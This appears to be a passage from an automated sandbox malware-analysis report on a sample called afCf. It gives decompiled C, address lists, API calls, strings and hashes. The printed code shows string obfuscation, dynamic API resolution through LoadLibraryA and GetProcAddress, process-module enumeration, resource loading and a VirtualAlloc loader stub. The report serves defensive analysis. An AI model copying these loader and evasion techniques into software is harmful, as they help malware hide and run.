						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x75f4cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

W, xrefs: 00401B14
4, xrefs: 00402136
[, xrefs: 00402047
v, xrefs: 00401E4B
V, xrefs: 00401E19
{, xrefs: 00401E3C
%, xrefs: 004020FA
', xrefs: 00402006
o, xrefs: 00402097
{, xrefs: 0040211D
{, xrefs: 00401B4B
., xrefs: 00401B0A
___, xrefs: 0040227D
., xrefs: 0040201F
o, xrefs: 00401B8D
*, xrefs: 004020E1
4, xrefs: 00401B64
_._, xrefs: 00402257
{, xrefs: 0040205B
v, xrefs: 0040212C
', xrefs: 00401AF6
W, xrefs: 00401B23
x, xrefs: 00401B78
x, xrefs: 00401E69
W, xrefs: 004020E6
v, xrefs: 00401B5A
), xrefs: 0040202E
U, xrefs: 004020F5
5, xrefs: 00402109
4, xrefs: 00402074
W, xrefs: 00402033
h, xrefs: 00401A6F
PPOs, xrefs: 00402183
x, xrefs: 0040214A
E, xrefs: 00401E0F
*, xrefs: 00401A1F
8, xrefs: 00401BA9
!, xrefs: 00401B1E
6, xrefs: 004020C5
:, xrefs: 00401B28
V, xrefs: 00402038
x, xrefs: 00402088
!, xrefs: 004020CF
D, xrefs: 00401DFB
!, xrefs: 0040201A
0, xrefs: 00401BBD
v, xrefs: 0040206A
[, xrefs: 00401B37
", xrefs: 00401B0F
o, xrefs: 00402159

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPOs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2828641291
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 0066092B Relevance: 3.8, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 00660966
., xrefs: 0066095F
GetProcAddress., xrefs: 006609DC, 006609DF, 006609E4

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 0767a01f73073ddf8465d6856b91ef3e7ecdbbdeaa762bea784f0377986859a6
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 2F316CB6900609DFEB10CF99C880AEEBBF6FF48324F24515AD441A7351D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0066003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0066024D

Strings

kernel32.dll, xrefs: 0066008F, 00660095
cess, xrefs: 0066018D

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8728a758dab89e9ea64e30a78b4b1ed508de18543e59f78f2a777fecd39c5750
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 91526874A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E94DAB351DB30AE85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
